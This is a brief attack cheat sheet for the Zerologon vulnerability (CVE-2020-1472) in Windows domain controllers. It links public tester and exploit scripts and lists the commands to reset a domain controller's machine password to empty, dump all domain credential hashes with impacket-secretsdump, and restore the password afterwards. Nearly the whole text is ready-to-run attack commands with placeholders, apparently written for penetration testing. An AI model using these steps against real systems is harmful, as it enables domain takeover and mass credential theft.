# zero logon exploit

## Information

This exploit changes the DC Password to an empty string.

* [SecuraBV/CVE-2020-1472/zerologon\_tester.py](https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py)
* `python3 zerologon_tester.py DOMAIN DC_IP`

## Exploit

1. Clone [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
2. `python3 exploit.py DOMAIN DC_IP`

### Dump hashes

* `impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP - no-pass`

### Restore

1. `impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP`
2. Note the plaintext password `plain_password_hex`
3. `python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX`